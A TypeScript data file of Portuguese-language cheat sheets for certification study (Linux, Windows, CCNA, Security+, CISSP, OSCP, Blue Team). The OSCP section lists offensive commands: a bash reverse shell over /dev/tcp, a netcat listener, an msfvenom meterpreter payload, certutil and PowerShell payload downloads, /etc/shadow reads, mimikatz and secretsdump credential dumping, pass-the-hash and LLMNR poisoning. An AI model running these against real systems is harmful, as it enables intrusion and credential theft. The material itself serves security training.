export type CheatSheetSection = {
  title: string;
  items: { command: string; description: string }[];
};

export type CheatSheet = {
  id: string;
  title: string;
  subtitle: string;
  icon: string;
  accent: string;
  sections: CheatSheetSection[];
};

export const cheatSheets: CheatSheet[] = [
  {
    id: "linux",
    title: "Linux — Terminal Essencial",
    subtitle: "Comandos essenciais para administração e segurança de sistemas Linux",
    icon: "terminal",
    accent: "green",
    sections: [
      {
        title: "Navegação e Arquivos",
        items: [
          { command: "pwd", description: "Exibe o diretório de trabalho atual" },
          { command: "ls -la", description: "Lista todos os arquivos com permissões e detalhes" },
          { command: "cd /caminho", description: "Muda para o diretório especificado" },
          { command: "mkdir -p a/b/c", description: "Cria diretórios recursivamente" },
          { command: "cp -r src dst", description: "Copia arquivo ou diretório recursivamente" },
          { command: "mv arquivo /novo/caminho", description: "Move ou renomeia arquivo/diretório" },
          { command: "rm -rf diretorio", description: "Remove diretório recursivamente (cuidado!)" },
          { command: "find / -name '*.log' 2>/dev/null", description: "Busca arquivos por nome em todo o sistema" },
        ],
      },
      {
        title: "Permissões e Propriedade",
        items: [
          { command: "chmod 755 arquivo", description: "Define permissões rwxr-xr-x" },
          { command: "chmod +x script.sh", description: "Torna o arquivo executável" },
          { command: "chown usuario:grupo arquivo", description: "Altera dono e grupo do arquivo" },
          { command: "umask 022", description: "Define máscara de permissão padrão (644/755)" },
          { command: "sudo visudo", description: "Edita o arquivo sudoers com validação sintática" },
          { command: "stat arquivo", description: "Exibe metadados e permissões detalhadas" },
        ],
      },
      {
        title: "Processos e Serviços",
        items: [
          { command: "ps aux", description: "Lista todos os processos em execução" },
          { command: "top / htop", description: "Monitora processos e uso de recursos em tempo real" },
          { command: "kill -9 PID", description: "Força a terminação de um processo" },
          { command: "systemctl status sshd", description: "Verifica o status de um serviço" },
          { command: "systemctl enable --now nginx", description: "Habilita e inicia um serviço imediatamente" },
          { command: "crontab -e", description: "Edita tarefas agendadas do usuário atual" },
          { command: "journalctl -u sshd --since today", description: "Consulta logs de um serviço específico" },
          { command: "nohup comando &", description: "Executa comando em background persistente" },
        ],
      },
      {
        title: "Redes e Conectividade",
        items: [
          { command: "ip a", description: "Exibe interfaces e endereços IP configurados" },
          { command: "ss -tuln", description: "Lista portas TCP/UDP em escuta" },
          { command: "netstat -anp", description: "Exibe conexões ativas e processos associados" },
          { command: "ping -c 4 host", description: "Testa conectividade com 4 pacotes ICMP" },
          { command: "traceroute host", description: "Rastreia a rota até um destino" },
          { command: "dig dominio.com", description: "Consulta registros DNS de um domínio" },
          { command: "curl -I https://site.com", description: "Faz requisição HTTP e exibe headers" },
          { command: "wget arquivo.zip", description: "Baixa arquivo de um servidor" },
        ],
      },
      {
        title: "Segurança e Auditoria",
        items: [
          { command: "last", description: "Lista últimos logins dos usuários" },
          { command: "who / whoami", description: "Exibe usuários logados / usuário atual" },
          { command: "cat /etc/passwd", description: "Lista contas de usuários do sistema" },
          { command: "cat /etc/shadow", description: "Lista hashes de senhas (requer root)" },
          { command: "ssh-keygen -t ed25519", description: "Gera par de chaves SSH Ed25519" },
          { command: "ufw status", description: "Verifica status do firewall Uncomplicated" },
          { command: "auditctl -l", description: "Lista regras do subsistema de auditoria" },
          { command: "fail2ban-client status sshd", description: "Verifica bloqueios automáticos do Fail2ban" },
        ],
      },
      {
        title: "Empacotamento e Software",
        items: [
          { command: "apt update && apt upgrade -y", description: "Atualiza repositórios e pacotes (Debian/Ubuntu)" },
          { command: "yum update -y", description: "Atualiza pacotes (CentOS/RHEL)" },
          { command: "dnf install pacote", description: "Instala pacote (Fedora/RHEL 8+)" },
          { command: "rpm -qa | grep ssh", description: "Lista pacotes RPM instalados" },
          { command: "dpkg -l | grep nginx", description: "Lista pacotes DEB instalados" },
          { command: "snap list", description: "Lista pacotes Snap instalados" },
        ],
      },
    ],
  },
  {
    id: "windows",
    title: "Windows — PowerShell & Eventos",
    subtitle: "Comandos e configurações essenciais para segurança em ambientes Windows",
    icon: "cpu",
    accent: "cyan",
    sections: [
      {
        title: "PowerShell Essencial",
        items: [
          { command: "Get-Process", description: "Lista processos em execução" },
          { command: "Get-Service | Where Status -eq 'Running'", description: "Filtra serviços ativos" },
          { command: "Get-LocalUser", description: "Lista usuários locais do sistema" },
          { command: "Get-LocalGroupMember 'Administradores'", description: "Lista membros do grupo Administradores" },
          { command: "Get-ChildItem C:\\ -Recurse -Filter '*.exe' -ErrorAction SilentlyContinue", description: "Busca executáveis recursivamente" },
          { command: "Test-NetConnection -ComputerName host -Port 443", description: "Testa conectividade TCP a uma porta" },
          { command: "Get-NetTCPConnection -State Listen", description: "Lista portas em escuta" },
          { command: "Get-HotFix", description: "Lista atualizações de segurança instaladas" },
        ],
      },
      {
        title: "Event Viewer (Logs)",
        items: [
          { command: "Event ID 4624", description: "Login bem-sucedido (analisar Type 10 = RDP)" },
          { command: "Event ID 4625", description: "Tentativa de login falhada (indicador de brute force)" },
          { command: "Event ID 4720", description: "Conta de usuário criada" },
          { command: "Event ID 4728", description: "Usuário adicionado a grupo (privilege escalation)" },
          { command: "Event ID 4688", description: "Novo processo criado (command line logging)" },
          { command: "Event ID 4697", description: "Serviço instalado no sistema" },
          { command: "Event ID 7045", description: "Novo serviço instalado (alternate log)" },
          { command: "Event ID 1102", description: "Log de segurança foi limpo (suspeito!)" },
        ],
      },
      {
        title: "Defender & Proteção",
        items: [
          { command: "Get-MpThreatDetection", description: "Lista detecções do Windows Defender" },
          { command: "Get-MpPreference | Select ExclusionPath", description: "Exibe exclusões do Defender (verificar abuso)" },
          { command: "Add-MpPreference -ExclusionPath 'C:\\temp'", description: "Adiciona exclusão (uso legítimo ou abuse)" },
          { command: "Get-MpComputerStatus", description: "Exibe status geral do antimalware" },
          { command: "Start-MpScan -ScanType FullScan", description: "Inicia varredura completa" },
          { command: "Get-MpThreat", description: "Lista ameaças ativas/quarentenadas" },
        ],
      },
      {
        title: "Active Directory (Quick)",
        items: [
          { command: "Get-ADUser -Filter * -Properties LastLogonDate", description: "Lista usuários AD com último login" },
          { command: "Get-ADUser -Identity usuario -Properties MemberOf", description: "Exibe grupos do usuário" },
          { command: "Get-ADGroupMember 'Domain Admins'", description: "Lista membros de Domain Admins" },
          { command: "Search-ADAccount -AccountExpired", description: "Encontra contas expiradas" },
          { command: "Get-ADDomainController", description: "Lista domain controllers" },
          { command: "Repadmin /showrepl", description: "Verifica replicação entre DCs" },
        ],
      },
      {
        title: "Redes Windows",
        items: [
          { command: "ipconfig /all", description: "Exibe configuração completa de rede" },
          { command: "netstat -ano", description: "Lista conexões ativas com PIDs" },
          { command: "route print", description: "Exibe tabela de roteamento" },
          { command: "nslookup dominio.com", description: "Consulta DNS de um domínio" },
          { command: "tracert host", description: "Rastreia rota até destino" },
          { command: "arp -a", description: "Exibe tabela ARP (interfaces vizinhas)" },
          { command: "Get-NetFirewallProfile | Select Name, Enabled", description: "Verifica status dos perfis de firewall" },
          { command: "Get-NetFirewallRule -Enabled True | Measure", description: "Conta regras de firewall ativas" },
        ],
      },
      {
        title: "Hardening Rápido",
        items: [
          { command: "secpol.msc", description: "Abre Política de Segurança Local" },
          { command: "gpedit.msc", description: "Abre Editor de Política de Grupo Local" },
          { command: "Get-SmbServerConfiguration | Select EnableSMB1Protocol", description: "Verifica se SMBv1 está habilitado (desabilitar!)" },
          { command: "Set-SmbServerConfiguration -EnableSMB1Protocol $false", description: "Desabilita SMBv1" },
          { command: "Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol", description: "Remove SMBv1 permanentemente" },
          { command: "Get-LocalUser | Where Enabled -eq $true", description: "Lista contas habilitadas" },
          { command: "Disable-LocalUser -Name 'Guest'", description: "Desabilita conta Guest" },
          { command: "Get-BitLockerVolume", description: "Verifica status de criptografia BitLocker" },
        ],
      },
    ],
  },
  {
    id: "ccna",
    title: "CCNA — Redes Fundamentais",
    subtitle: "Conceitos e comandos essenciais de redes para o exame CCNA 200-301",
    icon: "network",
    accent: "blue",
    sections: [
      {
        title: "Modelo OSI & TCP/IP",
        items: [
          { command: "Camada 1 — Física", description: "Bits, cabos, sinais elétricos/ópticos" },
          { command: "Camada 2 — Enlace", description: "Frames, MAC, Ethernet, switches" },
          { command: "Camada 3 — Rede", description: "Pacotes, IP, roteadores, ICMP" },
          { command: "Camada 4 — Transporte", description: "Segmentos, TCP (confiável), UDP (rápido)" },
          { command: "Camada 5 — Sessão", description: "Estabelece, gerencia e encerra sessões" },
          { command: "Camada 6 — Apresentação", description: "Formatação, criptografia, compressão" },
          { command: "Camada 7 — Aplicação", description: "HTTP, DNS, FTP, SMTP, SSH" },
        ],
      },
      {
        title: "Subnetting Rápido",
        items: [
          { command: "/24 = 255.255.255.0", description: "254 hosts úteis por rede" },
          { command: "/25 = 255.255.255.128", description: "126 hosts úteis" },
          { command: "/26 = 255.255.255.192", description: "62 hosts úteis" },
          { command: "/27 = 255.255.255.224", description: "30 hosts úteis" },
          { command: "/28 = 255.255.255.240", description: "14 hosts úteis" },
          { command: "/30 = 255.255.255.252", description: "2 hosts úteis (link point-to-point)" },
          { command: "Fórmula: 2^(32-prefix) - 2", description: "Calcula hosts úteis de qualquer prefixo" },
          { command: "Private ranges", description: "10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16" },
        ],
      },
      {
        title: "Comandos Cisco IOS",
        items: [
          { command: "enable / configure terminal", description: "Entra no modo privilegiado / configuração global" },
          { command: "show ip interface brief", description: "Resumo de interfaces e status IP" },
          { command: "show running-config", description: "Exibe configuração atual em memória" },
          { command: "show ip route", description: "Exibe tabela de roteamento" },
          { command: "show mac address-table", description: "Exibe tabela MAC do switch" },
          { command: "show cdp neighbors", description: "Descobre dispositivos Cisco vizinhos" },
          { command: "show vlan brief", description: "Lista VLANs configuradas" },
          { command: "show spanning-tree", description: "Exibe estado do Spanning Tree Protocol" },
        ],
      },
      {
        title: "Protocolos Essenciais",
        items: [
          { command: "ARP", description: "Mapeia IP → MAC na rede local (camada 2)" },
          { command: "DHCP (DORA)", description: "Discover, Offer, Request, Acknowledge" },
          { command: "DNS", description: "Resolve nomes de domínio → IP (porta 53)" },
          { command: "NAT", description: "Traduz IPs privados → públicos (PAT usa portas)" },
          { command: "OSPF", description: "Roteamento dinâmico link-state, métrica = custo" },
          { command: "VLAN", description: "Segmentação lógica na camada 2 (802.1Q trunking)" },
          { command: "STP", description: "Previne loops em switches (Root Bridge, port states)" },
          { command: "EtherChannel", description: "Agrega links físicos em um canal lógico (LACP)" },
        ],
      },
      {
        title: "Portas & Protocolos (Memorizar)",
        items: [
          { command: "20/21 — FTP", description: "Dados/Controle de transferência de arquivos" },
          { command: "22 — SSH", description: "Acesso remoto seguro" },
          { command: "23 — Telnet", description: "Acesso remoto inseguro (não usar!)" },
          { command: "25 — SMTP", description: "Envio de e-mail" },
          { command: "53 — DNS", description: "Resolução de nomes" },
          { command: "67/68 — DHCP", description: "Atribuição automática de IP" },
          { command: "80/443 — HTTP/HTTPS", description: "Web não segura / segura (TLS)" },
          { command: "110/143 — POP3/IMAP", description: "Recebimento de e-mail" },
          { command: "3389 — RDP", description: "Área de trabalho remota Windows" },
        ],
      },
      {
        title: "Segurança de Redes",
        items: [
          { command: "Port Security", description: "Limita MACs permitidos por porta do switch" },
          { command: "DHCP Snooping", description: "Bloqueia servidores DHCP não autorizados" },
          { command: "DAI (Dynamic ARP Inspection)", description: "Valida ARP contra tabela DHCP snooping" },
          { command: "ACL (Access Control List)", description: "Filtra tráfego por IP/porta/protocolo" },
          { command: "802.1X", description: "Autenticação de dispositivos na rede (EAP/RADIUS)" },
          { command: "VPN (IPsec/SSL)", description: "Túneis criptografados para acesso remoto" },
          { command: "Firewall (stateful)", description: "Filtra com base no estado da conexão" },
          { command: "IDS/IPS", description: "Detecta / previne intrusões por assinatura ou anomalia" },
        ],
      },
    ],
  },
  {
    id: "securityplus",
    title: "Security+ SY0-701",
    subtitle: "Domínios, frameworks e conceitos essenciais para o exame CompTIA Security+",
    icon: "shield",
    accent: "purple",
    sections: [
      {
        title: "Domínios do SY0-701",
        items: [
          { command: "Domínio 1 — General Security (12%)", description: "Conceitos, controles e frameworks de segurança" },
          { command: "Domínio 2 — Threats & Vulnerabilities (22%)", description: "Identificação e mitigação de ameaças" },
          { command: "Domínio 3 — Security Architecture (18%)", description: "Design seguro, criptografia, PKI" },
          { command: "Domínio 4 — Security Operations (28%)", description: "Monitoramento, resposta a incidentes, forense" },
          { command: "Domínio 5 — Security Program (20%)", description: "Governança, risco, compliance, gestão" },
        ],
      },
      {
        title: "Frameworks & Standards",
        items: [
          { command: "NIST CSF", description: "Identify, Protect, Detect, Respond, Recover" },
          { command: "NIST SP 800-53", description: "Controles de segurança para sistemas federais" },
          { command: "ISO 27001/27002", description: "SGSI e controles de segurança internacional" },
          { command: "CIS Controls", description: "18 controles críticos priorizados" },
          { command: "MITRE ATT&CK", description: "Matriz de TTPs de adversários reais" },
          { command: "PCI DSS", description: "Segurança de dados de cartão de pagamento" },
          { command: "GDPR / LGPD", description: "Proteção de dados pessoais (Europa / Brasil)" },
          { command: "HIPAA", description: "Proteção de dados de saúde (EUA)" },
        ],
      },
      {
        title: "Tipos de Controle",
        items: [
          { command: "Técnico (Logical)", description: "Firewall, IDS, criptografia, IAM" },
          { command: "Administrativo (Managerial)", description: "Políticas, procedimentos, treinamento" },
          { command: "Físico", description: "Cercas, câmeras, biometria, guards" },
          { command: "Preventivo", description: "Impede o incidente (firewall, MFA)" },
          { command: "Detectivo", description: "Identifica o incidente (IDS, logs, CCTV)" },
          { command: "Corretivo", description: "Restaura após incidente (backup, patches)" },
          { command: "Deterrente", description: "Desencoraja (sinais, políticas, luzes)" },
          { command: "Compensatório", description: "Alternativa quando controle primário não é viável" },
        ],
      },
      {
        title: "Criptografia & PKI",
        items: [
          { command: "AES-256", description: "Criptografia simétrica padrão (bloco)" },
          { command: "RSA / ECC", description: "Criptografia assimétrica (chave pública/privada)" },
          { command: "SHA-256 / SHA-3", description: "Hashing (integridade, não reversível)" },
          { command: "TLS 1.3", description: "Segurança de transporte (HTTPS)" },
          { command: "Certificado Digital (X.509)", description: "Vincula identidade a chave pública" },
          { command: "CA (Certificate Authority)", description: "Emite e assina certificados" },
          { command: "CRL / OCSP", description: "Verifica revogação de certificados" },
          { command: "HSM", description: "Hardware Security Module — armazenamento seguro de chaves" },
        ],
      },
      {
        title: "Ataques Comuns (Memorizar)",
        items: [
          { command: "Phishing", description: "Engenharia social via e-mail para roubar credenciais" },
          { command: "Ransomware", description: "Criptografa dados e exige resgate" },
          { command: "SQL Injection", description: "Injeta SQL em inputs não sanitizados" },
          { command: "XSS", description: "Injeta scripts maliciosos em páginas web" },
          { command: "Buffer Overflow", description: "Sobrescreve memória além do limite alocado" },
          { command: "Zero-day", description: "Vulnerabilidade sem patch disponível" },
          { command: "Supply Chain Attack", description: "Compromete software/hardware de terceiros" },
          { command: "Insider Threat", description: "Ameaça interna (funcionário malicioso ou negligente)" },
        ],
      },
      {
        title: "Resposta a Incidentes (PICERL)",
        items: [
          { command: "Preparation", description: "Playbooks, ferramentas, treinamento prévio" },
          { command: "Identification", description: "Detectar e classificar o incidente" },
          { command: "Containment", description: "Isolar sistemas afetados para limitar dano" },
          { command: "Eradication", description: "Remover a causa raiz (malware, acesso)" },
          { command: "Recovery", description: "Restaurar sistemas ao estado normal" },
          { command: "Lessons Learned", description: "Documentar e melhorar processos" },
        ],
      },
    ],
  },
  {
    id: "cissp",
    title: "CISSP — Domínios CBK",
    subtitle: "Os 8 domínios do Common Body of Knowledge para o exame CISSP",
    icon: "award",
    accent: "yellow",
    sections: [
      {
        title: "Domínio 1 — Security & Risk Management (15%)",
        items: [
          { command: "Confidencialidade", description: "Garantir que dados são acessados apenas por autorizados" },
          { command: "Integridade", description: "Garantir que dados não são alterados indevidamente" },
          { command: "Disponibilidade", description: "Garantir acesso quando necessário (CIA Triad)" },
          { command: "ALE = SLE × ARO", description: "Annualized Loss Expectancy calcula risco financeiro" },
          { command: "SLE = AV × EF", description: "Single Loss Expectancy = Asset Value × Exposure Factor" },
          { command: "BCP / DRP", description: "Business Continuity / Disaster Recovery Planning" },
          { command: "RTO / RPO", description: "Recovery Time / Point Objective — metas de recuperação" },
          { command: "MTD", description: "Maximum Tolerable Downtime — tempo máximo aceitável" },
        ],
      },
      {
        title: "Domínio 2 — Asset Security (10%)",
        items: [
          { command: "Data Classification", description: "Public, Internal, Confidential, Restricted" },
          { command: "Data States", description: "At rest, in transit, in use (proteger os três)" },
          { command: "Data Retention", description: "Política de quanto tempo manter dados" },
          { command: "Data Destruction", description: "Clearing, Purging, Destruction (NIST SP 800-88)" },
          { command: "DLP", description: "Data Loss Prevention — previne vazamento de dados" },
          { command: "Asset Management", description: "Inventário, classificação, ciclo de vida" },
        ],
      },
      {
        title: "Domínio 3 — Security Architecture (13%)",
        items: [
          { command: "Defense in Depth", description: "Múltiplas camadas de controle sobrepostas" },
          { command: "Zero Trust", description: "Never trust, always verify — micro-segmentação" },
          { command: "Least Privilege", description: "Conceder apenas o mínimo necessário" },
          { command: "Separation of Duties", description: "Nenhuma pessoa controla processo crítico inteiro" },
          { command: "Security Models", description: "Bell-LaPadula (confidencialidade), Biba (integridade)" },
          { command: "Cryptographic Concepts", description: "Symmetric, Asymmetric, Hashing, PKI, Key Management" },
          { command: "Secure Design Principles", description: "Fail secure, economy of mechanism, complete mediation" },
        ],
      },
      {
        title: "Domínio 4 — Communication & Network (13%)",
        items: [
          { command: "OSI Model", description: "7 camadas — entender segurança em cada uma" },
          { command: "TCP/IP Suite", description: "Application, Transport, Internet, Network Access" },
          { command: "Network Devices", description: "Router (L3), Switch (L2), Firewall, IDS/IPS, Proxy" },
          { command: "VPN Types", description: "Site-to-site (IPsec), Remote access (SSL/TLS)" },
          { command: "Wireless Security", description: "WPA3, 802.1X, EAP, rogue AP detection" },
          { command: "Cloud Models", description: "IaaS, PaaS, SaaS / Public, Private, Hybrid" },
          { command: "SDN / NFV", description: "Software-Defined Networking / Network Function Virtualization" },
        ],
      },
      {
        title: "Domínio 5 — Identity & Access (13%)",
        items: [
          { command: "AAA", description: "Authentication, Authorization, Accounting" },
          { command: "MFA Factors", description: "Knowledge, Possession, Inherence (algo que sabe/tem/é)" },
          { command: "SSO / Federation", description: "Single Sign-On via SAML, OAuth, OIDC" },
          { command: "RBAC / ABAC", description: "Role-Based / Attribute-Based Access Control" },
          { command: "Privileged Access", description: "PAM, vault, just-in-time, break-glass" },
          { command: "Identity Lifecycle", description: "Provisioning → Review → Deprovisioning" },
          { command: "Kerberos", description: "TGT → TGS → Service Ticket (mutual authentication)" },
        ],
      },
      {
        title: "Domínio 6 — Security Assessment (12%)",
        items: [
          { command: "Vulnerability Assessment", description: "Identifica e prioriza vulnerabilidades (scanner)" },
          { command: "Penetration Testing", description: "Explora vulnerabilidades de forma controlada" },
          { command: "PTES", description: "Penetration Testing Execution Standard (7 fases)" },
          { command: "OWASP Top 10", description: "10 riscos mais críticos em aplicações web" },
          { command: "Security Audits", description: "Avaliação independente contra padrões" },
          { command: "Compliance Assessment", description: "Verifica conformidade com regulamentações" },
          { command: "Third-party Assessment", description: "Avalia riscos de fornecedores e parceiros" },
        ],
      },
      {
        title: "Domínio 7 — Security Operations (13%)",
        items: [
          { command: "Incident Response", description: "Preparation → Detection → Response → Mitigation → Reporting → Recovery" },
          { command: "Digital Forensics", description: "Coleta, preservação, análise, apresentação de evidências" },
          { command: "Chain of Custody", description: "Documentação contínua da posse de evidências" },
          { command: "SIEM", description: "Security Information and Event Management" },
          { command: "SOAR", description: "Security Orchestration, Automation and Response" },
          { command: "Backup Strategies", description: "Full, Incremental, Differential — 3-2-1 rule" },
          { command: "Logging & Monitoring", description: "Centralização, correlação, alertas" },
        ],
      },
      {
        title: "Domínio 8 — Software Development (11%)",
        items: [
          { command: "SDLC", description: "Planning → Analysis → Design → Implementation → Testing → Maintenance" },
          { command: "Secure SDLC", description: "Integra segurança em cada fase do ciclo" },
          { command: "DevSecOps", description: "Segurança integrada ao pipeline CI/CD" },
          { command: "Code Review", description: "Revisão estática (SAST) e dinâmica (DAST)" },
          { command: "SCA", description: "Software Composition Analysis — vulnerabilidades em dependências" },
          { command: "Secure Coding", description: "Input validation, output encoding, error handling" },
          { command: "API Security", description: "Autenticação, rate limiting, input validation" },
        ],
      },
    ],
  },
  {
    id: "oscp",
    title: "OSCP — Pentest Essentials",
    subtitle: "Metodologia e comandos essenciais para pentesting (estilo OSCP/PNPT)",
    icon: "terminal",
    accent: "red",
    sections: [
      {
        title: "Reconhecimento (Recon)",
        items: [
          { command: "nmap -sC -sV -oN scan.txt IP", description: "Scan de versão + scripts default, output normal" },
          { command: "nmap -sU --top-ports 100 IP", description: "Scan UDP das 100 portas mais comuns" },
          { command: "nmap -A -T4 -p- IP", description: "Scan agressivo de todas as portas TCP" },
          { command: "gobuster dir -u http://IP -w /usr/share/wordlists/dirb/common.txt", description: "Enumeração de diretórios web" },
          { command: "ffuf -u http://IP/FUZZ -w wordlist.txt", description: "Fuzzing rápido de URLs" },
          { command: "nikto -h http://IP", description: "Scanner de vulnerabilidades web" },
          { command: "whatweb http://IP", description: "Identifica tecnologias web (CMS, frameworks)" },
          { command: "dnsrecon -d dominio.com", description: "Enumeração DNS (subdomínios, zone transfer)" },
        ],
      },
      {
        title: "Enumeração de Serviços",
        items: [
          { command: "enum4linux -a IP", description: "Enumeração SMB/NetBIOS (shares, users, groups)" },
          { command: "smbclient -L //IP", description: "Lista shares SMB disponíveis" },
          { command: "snmpwalk -v2c -c public IP", description: "Enumera informações via SNMP (community string)" },
          { command: "rpcclient -U '' IP", description: "Conexão RPC nula para enumeração Windows" },
          { command: "ldapsearch -x -H ldap://IP -b 'DC=domain,DC=local'", description: "Enumeração LDAP/AD" },
          { command: "hydra -l admin -P passwords.txt ssh://IP", description: "Brute force SSH com lista de senhas" },
          { command: "wfuzz -c -z file,wordlist.txt -u http://IP/FUZZ", description: "Fuzzing de parâmetros web" },
        ],
      },
      {
        title: "Exploitation & Shells",
        items: [
          { command: "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'", description: "Upgrade para shell TTY interativa" },
          { command: "nc -lvnp 4444", description: "Listener Netcat para reverse shell" },
          { command: "bash -i >& /dev/tcp/IP/4444 0>&1", description: "Reverse shell bash simples" },
          { command: "msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f elf -o shell.elf", description: "Gera payload Meterpreter para Linux" },
          { command: "searchsploit service version", description: "Busca exploits no ExploitDB offline" },
          { command: "python3 -m http.server 8000", description: "Servidor HTTP rápido para transferir arquivos" },
          { command: "certutil -urlcache -split -f http://IP/file.exe", description: "Download de arquivo via Windows (certutil)" },
          { command: "Invoke-WebRequest -Uri http://IP/file.exe -OutFile file.exe", description: "Download via PowerShell" },
        ],
      },
      {
        title: "Privilege Escalation",
        items: [
          { command: "sudo -l", description: "Lista comandos sudo disponíveis sem senha" },
          { command: "find / -perm -4000 -type f 2>/dev/null", description: "Encontra binários SUID" },
          { command: "cat /etc/passwd && cat /etc/shadow", description: "Lê usuários e hashes (se acesso root)" },
          { command: "linpeas.sh", description: "Script automático de enumeração Linux para priv esc" },
          { command: "winPEAS.exe", description: "Script automático de enumeração Windows" },
          { command: "Get-PrivilegeEscalation", description: "Módulo PowerUp para Windows" },
          { command: "unquoted path services", description: "Serviços Windows com caminho não quotado = priv esc" },
          { command: "AlwaysInstallElevated", description: "Registry key que permite MSI install como SYSTEM" },
        ],
      },
      {
        title: "Pós-Exploração & Lateralização",
        items: [
          { command: "hashdump (meterpreter)", description: "Extrai hashes NTLM do SAM database" },
          { command: "mimikatz sekurlsa::logonpasswords", description: "Extrai credenciais da memória LSASS" },
          { command: "pass-the-hash (pth-winexe)", description: "Autentica com hash NTLM sem plaintext" },
          { command: "crackmapexec smb IP -u user -H hash", description: "Autenticação SMB com hash (lateral movement)" },
          { command: "secretsdump.py DOMAIN/user:pass@IP", description: "Extrai hashes via DCSync/remote SAM" },
          { command: " BloodHound", description: "Mapeia relações AD para encontrar caminhos de priv esc" },
          { command: "chisel / ssh tunnel", description: "Port forwarding para acessar redes internas" },
          { command: "responder -I eth0", description: "Envenena LLMNR/NBT-NS para capturar hashes" },
        ],
      },
      {
        title: "Relatório & Documentação",
        items: [
          { command: "Evidência: screenshots", description: "Capturar cada passo com timestamp" },
          { command: "Comando + Output", description: "Documentar comando executado e resultado" },
          { command: "Impacto", description: "Descrever o impacto business de cada finding" },
          { command: "Remediação", description: "Recomendar correção específica e priorizada" },
          { command: "CVSS Score", description: "Pontuar severidade usando Common Vulnerability Scoring" },
          { command: "Executive Summary", description: "Resumo não-técnico para stakeholders" },
        ],
      },
    ],
  },
  {
    id: "blueteam",
    title: "Blue Team — SOC & Detecção",
    subtitle: "Técnicas essenciais de defesa, detecção e resposta para analistas SOC",
    icon: "shield",
    accent: "cyan",
    sections: [
      {
        title: "Triage de Alertas",
        items: [
          { command: "Severidade Crítica", description: "Ação imediata — ransomware, data exfil, lateral movement ativo" },
          { command: "Severidade Alta", description: "Investigar em 1h — brute force bem-sucedido, priv esc" },
          { command: "Severidade Média", description: "Investigar em 4h — malware detectado, policy violation" },
          { command: "Severidade Baixa", description: "Investigar em 24h — info gathering, scanning" },
          { command: "Falso Positivo", description: "Documentar motivo e ajustar rule/tuning" },
          { command: "Contexto é rei", description: "Sempre correlacionar com asset, usuário e horário" },
        ],
      },
      {
        title: "Análise de Logs (SIEM)",
        items: [
          { command: "Sigma Rules", description: "Formato genérico para regras de detecção (converter para Splunk/ELK)" },
          { command: "YARA Rules", description: "Detecção de malware por padrões de bytes/strings" },
          { command: "KQL (Kusto)", description: "Linguagem de query do Microsoft Sentinel/Defender" },
          { command: "SPL (Splunk)", description: "Search Processing Language para Splunk" },
          { command: "EQL (Elastic)", description: "Event Query Language para Elastic Security" },
          { command: "Correlação temporal", description: "Agrupar eventos por janela de tempo e entidade" },
          { command: "Baseline de comportamento", description: "Estabelecer normal para detectar anomalias" },
          { command: "Enrichment", description: "VirusTotal, WHOIS, GeoIP, threat intel feeds" },
        ],
      },
      {
        title: "Detecção por MITRE ATT&CK",
        items: [
          { command: "T1059 — Command & Scripting", description: "Execução de comandos (PowerShell, CMD, bash)" },
          { command: "T1078 — Valid Accounts", description: "Uso de credenciais válidas (comprometidas)" },
          { command: "T1003 — OS Credential Dumping", description: "Extrair hashes/senhas (Mimikatz, LSASS)" },
          { command: "T1021 — Remote Services", description: "Lateral movement via RDP, SSH, WMI, SMB" },
          { command: "T1070 — Indicator Removal", description: "Limpar logs, desabilitar tools (anti-forensics)" },
          { command: "T1486 — Data Encrypted for Impact", description: "Ransomware (criptografia de dados)" },
          { command: "T1048 — Exfiltration Over Alt Protocol", description: "Vazar dados via DNS, ICMP, HTTPS" },
          { command: "T1190 — Exploit Public-Facing App", description: "Explorar vulnerabilidade em app exposto" },
        ],
      },
      {
        title: "Forense Digital (DFIR)",
        items: [
          { command: "Preservar evidência", description: "Nunca modificar o sistema original — image primeiro" },
          { command: "dd if=/dev/sda of=image.img bs=4M", description: "Cria imagem forense bit-a-bit do disco" },
          { command: "hashdeep / sha256sum", description: "Gera hash da evidência para chain of custody" },
          { command: "Volatility", description: "Framework de análise de memória RAM (processes, connections)" },
          { command: "Autopsy / FTK", description: "Análise forense de disco (file recovery, timeline)" },
          { command: "Timeline analysis", description: "Reconstruir sequência de eventos por timestamps" },
          { command: "Registry analysis", description: "Windows Registry — Run keys, USB history, ShimCache" },
          { command: "Network PCAP", description: "Análise de captura de tráfego (Wireshark, NetworkMiner)" },
        ],
      },
      {
        title: "Threat Hunting Proativo",
        items: [
          { command: "Hypothesis-driven", description: "Formular hipótese baseada em TTPs conhecidos" },
          { command: "Data-driven", description: "Analisar logs em busca de anomalias sem hipótese prévia" },
          { command: "OSQuery hunting", description: "Query SQL em endpoints (processes, files, network)" },
          { command: "Sysmon Event ID 1", description: "Process creation (command line logging)" },
          { command: "Sysmon Event ID 3", description: "Network connection (destination IP/port)" },
          { command: "Sysmon Event ID 7", description: "Image loaded (DLL injection detection)" },
          { command: "EDR Telemetry", description: "CrowdStrike, Defender for Endpoint, SentinelOne" },
          { command: "IOC Scanning", description: "Buscar hashes, IPs, domains em toda a base" },
        ],
      },
      {
        title: "Playbooks Essenciais",
        items: [
          { command: "Phishing Response", description: "Isolar e-mail → block sender → scan endpoints → notify users" },
          { command: "Malware Detection", description: "Isolar host → collect artifacts → scan network → eradicate" },
          { command: "Brute Force", description: "Block IP → reset credentials → enable MFA → review logs" },
          { command: "Data Exfiltration", description: "Block connection → isolate host → assess scope → notify DPO" },
          { command: "Ransomware", description: "Isolate immediately → assess spread → activate DRP → don't pay" },
          { command: "Insider Threat", description: "Monitor discreetly → collect evidence → involve HR/legal" },
          { command: "Escalation Path", description: "N1 → N2 → N3 → IR Team → Management → Legal" },
          { command: "Communication Plan", description: "Quem notificar, quando, e o que dizer (template pronto)" },
        ],
      },
    ],
  },
];

export function getCheatSheet(id: string): CheatSheet | undefined {
  return cheatSheets.find((cs) => cs.id === id);
}
